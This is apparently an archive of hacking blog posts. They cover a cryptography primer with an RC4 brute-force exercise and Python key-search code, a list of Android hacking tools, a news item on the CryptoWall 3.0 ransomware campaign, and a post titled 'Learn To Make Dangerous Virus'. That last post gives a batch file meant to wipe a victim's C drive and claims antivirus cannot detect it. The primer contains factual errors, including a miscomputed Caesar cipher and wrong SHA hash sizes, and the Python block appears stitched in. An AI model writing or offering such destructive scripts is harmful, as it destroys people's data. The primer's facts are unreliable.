Wednesday, July 20, 2016

How to make your data safe using Cryptography

In this article, we will introduce you to the world of cryptology and how you can secure information from falling into the wrong hands.

What is Cryptography?

Cryptography is the study and application of techniques that hide the real meaning of information by transforming it into non-human-readable formats and vice versa.

Let’s illustrate this with the aid of an example. Suppose you want to send the message “I LOVE APPLES”. You can replace every letter in the phrase with the third successive letter in the alphabet. The encrypted message will be “K NQYG CRRNGV”. To decrypt our message, we will have to go back three letters in the alphabet from the letter that we want to decrypt. The image below shows how the transformation is done.


The process of transforming information into non-human-readable form is called encryption.

The process of reversing encryption is called decryption.

Decryption is done using a secret key which is only known to the legitimate recipients of the information. The key is used to decrypt the hidden messages. This makes the communication secure because even if the attacker manages to get the information, it would not make sense to them.

The encrypted information is known as a cipher.


What is Cryptanalysis?


Cryptology encrypts messages using a secret key. Cryptanalysis is the art of trying to decrypt the encrypted messages without the use of the key that was used to encrypt the messages. Cryptanalysis uses mathematical analysis and algorithms to decipher the ciphers. The success of cryptanalysis attacks depends on:

  • Amount of time available
  • Computing power available
  • Storage capacity available

The following is a list of the commonly used cryptanalysis attacks:

Brute force attack – this type of attack uses algorithms that try to guess all the possible logical combinations of the plaintext which are then ciphered and compared against the original cipher.

Dictionary attack – this type of attack uses a wordlist in order to find a match of either the plaintext or key. It is mostly used when trying to crack encrypted passwords.

Rainbow table attack – this type of attack compares the cipher text against pre-computed hashes to find matches.


Encryption Algorithms

MD5 – this is the acronym for Message-Digest 5. It is used to create 128 bit hash values. Theoretically, hashes cannot be reversed into the original plain text. MD5 is used to hash passwords as well as check data integrity. MD5 is not collision resistant. Collision resistance is the difficulty of finding two values that produce the same hash value.

SHA – this is the acronym for Secure Hash Algorithm. SHA algorithms are used to generate condensed representations of a message (message digest). It has various versions such as:
  • SHA-0: produces 120 bit hash values. It was withdrawn from use due to significant flaws and replaced by SHA-1.
  • SHA-1: produces 160 bit hash values. It is similar to earlier versions of MD5. It has cryptographic weaknesses and has not been recommended for use since the year 2010.
  • SHA-2: it has two hash functions, namely SHA-256 and SHA-512. SHA-256 uses 32 bit words while SHA-512 uses 64 bit words.
  • SHA-3: this algorithm was formerly known as Keccak.

RC4 – this algorithm is used to create stream ciphers. It is mostly used in protocols such as Secure Socket Layer (SSL) to encrypt internet communication and Wired Equivalent Privacy (WEP) to secure wireless networks.

BLOWFISH – this algorithm is used to create keyed, symmetric block ciphers. It can be used to encrypt passwords and other data.

Hacking Activity: Hack Now!

In this practical scenario, we will create a simple cipher using the RC4 algorithm. We will then attempt to decrypt it using a brute-force attack. For this exercise, let us assume that we know the encryption secret key is 24 bits. We will use this information to break the cipher.

We will use CrypTool 1 as our cryptology tool. CrypTool 1 is an open source educational tool for cryptological studies. You can download it from http://www.cryptool.org/en/ct1-download-en


Creating the RC4 stream cipher


We will encrypt the following phrase:

Never underestimate the determination of a kid who is time-rich and cash-poor

We will use 00 00 00 as the encryption key.

  1. Open CrypTool 1.
  2. Replace the text with: Never underestimate the determination of a kid who is time-rich and cash-poor
  3. Click on the Encrypt/Decrypt menu.
  4. Point to Symmetric (modern), then select RC4 as shown above. The following window will appear.
  5. Select 24 bits as the encryption key.
  6. Set the value to 00 00 00.
  7. Click on the Encrypt button. You will get the following stream cipher.



Attacking the stream cipher

  1. Click on the Analysis menu.
  2. Point to Symmetric Encryption (modern), then select RC4 as shown above. You will get the following window.
  3. Remember the assumption made is that the secret key is 24 bits, so make sure you select 24 bits as the key length.
  4. Click on the Start button. You will get the following window.

Note: the time taken to complete the Brute-Force Analysis attack depends on the processing capacity of the machine being used and the key length. The longer the key length, the longer it takes to complete the attack.

When the analysis is complete, you will get the following results.

Note: a lower Entropy number means it is the most likely correct result. It is possible that a value higher than the lowest Entropy found is the correct result.

  5. Select the line that makes the most sense, then click on the Accept selection button when done.
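The exercise above, written out as an added Python example (not part of the original article and not CrypTool's own code): it encrypts the same phrase with RC4 under the key 00 00 00, then ranks candidate keys by the entropy of what they decrypt to. The names `rank_keys` and `search_bits` are assumptions of this example, and the search is limited to the lowest 12 bits of the 24-bit key so it finishes quickly.

```python
import math
from collections import Counter

# Phrase and key taken from the exercise above.
PLAINTEXT = b"Never underestimate the determination of a kid who is time-rich and cash-poor"
KEY = bytes([0x00, 0x00, 0x00])

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling followed by keystream XOR; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: low for natural-language text, high for random bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def rank_keys(ciphertext: bytes, search_bits: int = 12, top: int = 3):
    """Decrypt with every 24-bit key below 2**search_bits; return the lowest-entropy results."""
    scored = []
    for k in range(1 << search_bits):
        key = k.to_bytes(3, "big")
        candidate = rc4(key, ciphertext)
        scored.append((entropy(candidate), key, candidate))
    return sorted(scored)[:top]

if __name__ == "__main__":
    ciphertext = rc4(KEY, PLAINTEXT)
    for score, key, text in rank_keys(ciphertext):
        print(f"{score:.3f}  {key.hex(' ')}  {text[:40]!r}")
    # Every extra key bit doubles the search: 24 bits is 16,777,216 keys, 128 bits is 2**128.
    print(f"full 24-bit space: {1 << 24:,} keys")
```

The correct key stands out because English text has far lower byte entropy than the near-random output of a wrong key, which is why a short key gives no protection once the whole key space can be tried.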

Summary
  • Cryptography is the science of ciphering and deciphering messages.
  • A cipher is a message that has been transformed into a non-human-readable format.
  • Deciphering is reversing a cipher into the original text.
  • Cryptanalysis is the art of deciphering ciphers without the knowledge of the key used to cipher them.
  • Cryptology combines the techniques of both cryptography and cryptanalysis.

Tuesday, April 5, 2016

Latest Android Hacking Apps 2016





#1 Hackode

Hackode: The Hacker’s Toolbox is an application for penetration testers, ethical hackers, IT administrators and cyber security professionals to perform different tasks like reconnaissance, scanning, performing exploits, etc.

#2 Androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

#3 APKInspector

APKinspector is a powerful GUI tool for analysts to analyse Android applications. The goal of this project is to aid analysts and reverse engineers in visualizing compiled Android packages and their corresponding DEX code.

#4 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

#5 Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

#6 ZanTi

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

#7 Droid Sheep

DroidSheep can be easily used by anybody who has an Android device, and only the provider of the web service can protect the users. So anybody can test the security of his account by himself and can decide whether to keep on using the web service.

#8 dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

#9 Arpspoof

Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. This app redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths.

#10 Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

#11 Nmap for Android

Nmap (network mapper) is one of the best network scanner (port finder) tools. Nmap was mainly developed for Unix OS, but it is now available on Windows and Android as well. Nmap for Android is an Nmap app for your phone! Once your scan finishes you can e-mail the results. This application is not an official app, but it looks good.

So the above is all about the Latest Android Hacking Apps 2016.

Tuesday, July 7, 2015

Angler Exploit Kit’s Cryptowall 3.0 Campaign Highly Evasive




The SANS Internet Storm Center is reporting that the Angler exploit kit (EK) serving up Cryptowall 3.0 ransomware has been evolving rapidly by altering its URL patterns on an almost daily basis.
“The changes accumulate, and you might not recognize current traffic generated by Angler. After two weeks of vacation, I almost didn’t recognize it,” wrote Brad Duncan.
“Angler pushes different payloads, but we’re still seeing a lot of CryptoWall 3.0 from this EK. We first noticed CryptoWall 3.0 from Angler near the end of May 2015.”
The first week of the current malware spam campaign had an attachment named my_resume.zip that contained an HTML file named my_resume.svg which downloaded the Cryptowall 3.0 ransomware from a compromised server, but the attackers have made some adjustments.
“The extracted HTML file names use random numbers, with names like resume4210.html or resume9647.html. Furthermore, the CryptoWall is now hosted on various docs.google.com URLs. If you open one of these HTML files, your browser will generate traffic to a compromised server,” Duncan said last month.
“The return traffic is gzip compressed, so you won’t see it in the TCP stream from Wireshark. Exporting the text from Wireshark shows HTML that points to a shared document from a Google server. Examining the traffic in Wireshark, you’ll see a chain of events leading from the compromised server to docs.google.com.”
The team also detected the Angler exploit kit pushing CryptoWall 3.0 on 2015-05-26, the first time they had seen version 3.0 of CryptoWall used by Angler.
“In each case I’ve documented, the bitcoin address for the ransom payment was 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB. Angler EK is still being used by other groups to send different malware payloads. However, the appearance of CryptoWall 3.0 in Angler since 2015-06-26 using the same bitcoin address indicates this is a separate campaign by a specific actor,” Duncan said.
“The timing of these two campaigns, along with their consistent use of the same bitcoin addresses for the ransom payment, suggest they are related. They may have been initiated by the same actor. This is a significant trend in our current threat landscape.”
As recently as March 2015, researchers saw CryptoWall 3.0 being propagated through spam emails that came with a JavaScript attachment which posed as a resume inside an archive file.
The .JS file would connect to two URLs to download .JPG files, an old technique designed to bypass poorly designed intrusion detection systems (IDS) by disguising the malware as an image file.
The .JS file would execute the one.jpg and two.jpg files after a successful download, which were detected as TROJ_CRYPWAL.YOI and TSPY_FAREIT.YOI, respectively.

The Internet Crime Complaint Center (IC3) – a partnership between the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C) – reported recently that 992 U.S. victims of the Cryptowall ransomware campaign have incurred losses in excess of $18 million between April of 2014 and June of 2015.
“Recent IC3 reporting identifies CryptoWall as the most current and significant ransomware threat targeting U.S. individuals and businesses. CryptoWall and its variants have been used actively to target U.S. victims since April 2014,” the IC3 advisory stated.
“The financial impact to victims goes beyond the ransom fee itself, which is typically between $200 and $10,000. Many victims incur additional costs associated with network mitigation, network countermeasures, loss of productivity, legal fees, IT services, and/or the purchase of credit monitoring services for employees or customers.”
Source : http://darkmatters.norsecorp.com/2015/07/06/angler-exploit-kits-cryptowall-3-0-campaign-highly-evasive/

Monday, May 4, 2015

Google Dorks for SQL Injection


Here is the list of Google dorks for SQL injection.

Thursday, April 23, 2015

Learn To Make Dangerous Virus In A Minute


In this post I will teach you to make a simple yet very powerful, or you can say dangerous, computer virus using a batch file. No software is required to make this virus; Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


What will this virus do?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming, visit my post about Learn Batch Programming.


How to make the virus?


   1. Open Notepad and copy below code into it.


       @Echo off
       Del C:\ *.* |y


   2. Save this file as virus.bat (the name can be anything, but the .bat extension is a must).
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.